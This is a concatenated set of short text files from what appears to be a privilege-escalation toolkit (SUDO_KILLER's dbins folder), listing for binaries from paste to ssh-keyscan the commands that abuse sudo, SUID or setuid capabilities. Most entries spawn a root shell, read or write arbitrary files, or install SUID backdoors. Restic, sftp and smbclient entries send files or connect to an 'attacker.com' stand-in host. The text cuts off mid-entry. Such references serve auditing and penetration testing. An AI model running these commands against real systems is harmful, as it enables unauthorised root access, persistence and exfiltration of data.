2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo paste $LFILE 7 | -------------------------------------------------------------------------------- /dbins/pax.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/pax.txt -------------------------------------------------------------------------------- /dbins/pdb.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo 'import os; os.system("/bin/sh")' > $TF 7 | sudo pdb $TF 8 | cont 9 | -------------------------------------------------------------------------------- /dbins/pdftex.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pdftex --shell-escape '\write18{/bin/sh}\end' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which pdftex) . 16 | 17 | ./pdftex --shell-escape '\write18{/bin/sh}\end' 18 | -------------------------------------------------------------------------------- /dbins/perf.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo perf stat /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/perl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo perl -e 'exec "/bin/sh";' 6 | ***** Capabilities ***** 7 | If the binary has the Linux CAP_SETUID capability set or it is executed by 8 | another binary with the capability set, it can be used as a backdoor to 9 | maintain privileged access by manipulating its own process UID. 10 | * cp $(which perl) . 11 | sudo setcap cap_setuid+ep perl 12 | 13 | ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' 14 | -------------------------------------------------------------------------------- /dbins/perlbug.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;' 6 | -------------------------------------------------------------------------------- /dbins/pexec.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pexec /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/pg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pg /etc/profile 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/php.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * CMD="/bin/sh" 6 | sudo php -r "system('$CMD');" 7 | ***** Capabilities ***** 8 | If the binary has the Linux CAP_SETUID capability set or it is executed by 9 | another binary with the capability set, it can be used as a backdoor to 10 | maintain privileged access by manipulating its own process UID. 11 | * cp $(which php) . 12 | sudo setcap cap_setuid+ep php 13 | 14 | CMD="/bin/sh" 15 | ./php -r "posix_setuid(0); system('$CMD');" 16 | -------------------------------------------------------------------------------- /dbins/pic.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pic -U 6 | .PS 7 | sh X sh X 8 | ***** Limited SUID ***** 9 | If the binary has the SUID bit set, it may be abused to access the file system, 10 | escalate or maintain access with elevated privileges working as a SUID 11 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 12 | it only works on systems like Debian (<= Stretch) that allow the default sh 13 | shell to run with SUID privileges. 14 | This example creates a local SUID copy of the binary and runs it to maintain 15 | elevated privileges. To interact with an existing SUID binary skip the first 16 | command and run the program using its original path. 17 | * sudo install -m =xs $(which pic) . 18 | 19 | ./pic -U 20 | .PS 21 | sh X sh X 22 | -------------------------------------------------------------------------------- /dbins/pidstat.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * COMMAND=id 6 | sudo pidstat -e $COMMAND 7 | -------------------------------------------------------------------------------- /dbins/pip.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$ 7 | (tty)')" > $TF/setup.py 8 | sudo pip install $TF 9 | -------------------------------------------------------------------------------- /dbins/pip3.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$ 7 | (tty)')" > $TF/setup.py 8 | sudo pip install $TF 9 | -------------------------------------------------------------------------------- /dbins/pkexec.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pkexec /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/pkg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * It runs commands using a specially crafted FreeBSD package. Generate it 6 | with fpm and upload it to the target. 7 | TF=$(mktemp -d) 8 | echo 'id' > $TF/x.sh 9 | fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF 10 | sudo pkg install -y --no-repo-update ./x-1.0.txz 11 | -------------------------------------------------------------------------------- /dbins/posh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo posh 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which posh) . 16 | 17 | ./posh 18 | -------------------------------------------------------------------------------- /dbins/pr.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | pr -T $LFILE 7 | -------------------------------------------------------------------------------- /dbins/pry.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pry 6 | system("/bin/sh") 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which pry) . 17 | 18 | ./pry 19 | system("/bin/sh") 20 | -------------------------------------------------------------------------------- /dbins/psftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo psftp 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which psftp) . 17 | 18 | sudo psftp 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/psql.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * psql 6 | \? 7 | !/bin/sh 8 | -------------------------------------------------------------------------------- /dbins/ptx.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ptx -w 5000 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/puppet.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$ 6 | (tty)\"': }" 7 | -------------------------------------------------------------------------------- /dbins/pwsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pwsh 6 | -------------------------------------------------------------------------------- /dbins/python.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo python -c 'import os; os.system("/bin/sh")' 6 | ***** Capabilities ***** 7 | If the binary has the Linux CAP_SETUID capability set or it is executed by 8 | another binary with the capability set, it can be used as a backdoor to 9 | maintain privileged access by manipulating its own process UID. 10 | * cp $(which python) . 11 | sudo setcap cap_setuid+ep python 12 | 13 | ./python -c 'import os; os.setuid(0); os.system("/bin/sh")' 14 | -------------------------------------------------------------------------------- /dbins/python2.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | It runs in privileged context and may be used to access the file system, 3 | escalate or maintain access with elevated privileges if enabled on sudo. 4 | * sudo python -c 'import os; os.system("/bin/sh")' -------------------------------------------------------------------------------- /dbins/python3.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | It runs in privileged context and may be used to access the file system, 3 | escalate or maintain access with elevated privileges if enabled on sudo. 4 | * sudo python3 -c 'import os; os.system("/bin/sh")' -------------------------------------------------------------------------------- /dbins/rake.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rake -p '`/bin/sh 1>&0`' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which rake) . 16 | 17 | ./rake -p '`/bin/sh 1>&0`' 18 | -------------------------------------------------------------------------------- /dbins/rb.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/rb.txt -------------------------------------------------------------------------------- /dbins/rc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rc -c '/bin/sh' 6 | -------------------------------------------------------------------------------- /dbins/readelf.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo readelf -a @$LFILE 7 | -------------------------------------------------------------------------------- /dbins/red.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo red file_to_write 6 | a 7 | DATA 8 | . 9 | w 10 | q 11 | -------------------------------------------------------------------------------- /dbins/redcarpet.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo redcarpet "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/redis.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/redis.txt -------------------------------------------------------------------------------- /dbins/restic.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * RHOST=attacker.com 6 | RPORT=12345 7 | LFILE=file_or_dir_to_get 8 | NAME=backup_name 9 | sudo restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE" 10 | -------------------------------------------------------------------------------- /dbins/rev.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo rev $LFILE | rev 7 | -------------------------------------------------------------------------------- /dbins/rlogin.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/rlogin.txt -------------------------------------------------------------------------------- /dbins/rlwrap.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rlwrap /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/rpmdb.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rpmdb --eval '%(/bin/sh 1>&2)' 6 | -------------------------------------------------------------------------------- /dbins/rpmquery.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which rpmquery) . 16 | 17 | ./rpmquery --eval '%{lua:os.execute("/bin/sh")}' 18 | -------------------------------------------------------------------------------- /dbins/rpmverify.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rpmverify --eval '%(/bin/sh 1>&2)' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which rpmverify) . 16 | 17 | ./rpmverify --eval '%(/bin/sh 1>&2)' 18 | -------------------------------------------------------------------------------- /dbins/rsync.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null 6 | -------------------------------------------------------------------------------- /dbins/rtorrent.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/rtorrent.txt -------------------------------------------------------------------------------- /dbins/ruby.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ruby -e 'exec "/bin/sh"' 6 | ***** Capabilities ***** 7 | If the binary has the Linux CAP_SETUID capability set or it is executed by 8 | another binary with the capability set, it can be used as a backdoor to 9 | maintain privileged access by manipulating its own process UID. 10 | * cp $(which ruby) . 11 | sudo setcap cap_setuid+ep ruby 12 | 13 | ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"' 14 | -------------------------------------------------------------------------------- /dbins/run-mailcap.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo run-mailcap --action=view /etc/hosts 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/run-parts.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo run-parts --new-session --regex '^sh$' /bin 6 | -------------------------------------------------------------------------------- /dbins/sash.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sash 6 | -------------------------------------------------------------------------------- /dbins/scanmem.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo scanmem 6 | shell /bin/sh 7 | -------------------------------------------------------------------------------- /dbins/screen.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo screen 6 | -------------------------------------------------------------------------------- /dbins/script.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo script -q /dev/null 6 | -------------------------------------------------------------------------------- /dbins/scrot.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo scrot -e /bin/sh 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which scrot) . 16 | 17 | ./scrot -e /bin/sh 18 | -------------------------------------------------------------------------------- /dbins/sed.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * GNU version only. Also, this requires bash. 6 | sudo sed -n '1e exec sh 1>&0' /etc/hosts 7 | -------------------------------------------------------------------------------- /dbins/service.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo service ../../bin/sh 6 | -------------------------------------------------------------------------------- /dbins/setarch.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo setarch $(arch) /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/setfacl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_change 6 | USER=somebody 7 | sudo setfacl -m -u:$USER:rwx $LFILE 8 | -------------------------------------------------------------------------------- /dbins/setlock.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo setlock - /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/sftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * HOST=user@attacker.com 6 | sudo sftp $HOST 7 | !/bin/sh 8 | -------------------------------------------------------------------------------- /dbins/sg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sg root 6 | -------------------------------------------------------------------------------- /dbins/shuf.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The written file content is corrupted by adding a newline. 6 | LFILE=file_to_write 7 | sudo shuf -e DATA -o "$LFILE" 8 | -------------------------------------------------------------------------------- /dbins/slsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo slsh -e 'system("/bin/sh")' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which slsh) . 16 | 17 | ./slsh -e 'system("/bin/sh")' 18 | -------------------------------------------------------------------------------- /dbins/smbclient.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo smbclient '\\attacker\share' 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/snap.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * It runs commands using a specially crafted Snap package. Generate it with 6 | fpm and upload it to the target. 7 | COMMAND=id 8 | cd $(mktemp -d) 9 | mkdir -p meta/hooks 10 | printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install 11 | chmod +x meta/hooks/install 12 | fpm -n xxxx -s dir -t snap -a all meta 13 | sudo snap install xxxx_1.0_all.snap --dangerous --devmode 14 | -------------------------------------------------------------------------------- /dbins/socket.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/socket.txt -------------------------------------------------------------------------------- /dbins/soelim.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo soelim "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/softlimit.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo softlimit /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/sort.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo sort -m "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/split.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The shell prompt is not printed. 6 | sudo split --filter=/bin/sh /dev/stdin 7 | -------------------------------------------------------------------------------- /dbins/sqlite3.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sqlite3 /dev/null '.shell /bin/sh' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which sqlite3) . 16 | 17 | ./sqlite3 /dev/null '.shell /bin/sh' 18 | -------------------------------------------------------------------------------- /dbins/sqlmap.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')" 6 | -------------------------------------------------------------------------------- /dbins/ss.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ss -a -F $LFILE 7 | -------------------------------------------------------------------------------- /dbins/ssh-agent.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ssh-agent /bin/ 6 | -------------------------------------------------------------------------------- /dbins/ssh-keygen.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ssh-keygen -D ./lib.so 6 | -------------------------------------------------------------------------------- /dbins/ssh-keyscan.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 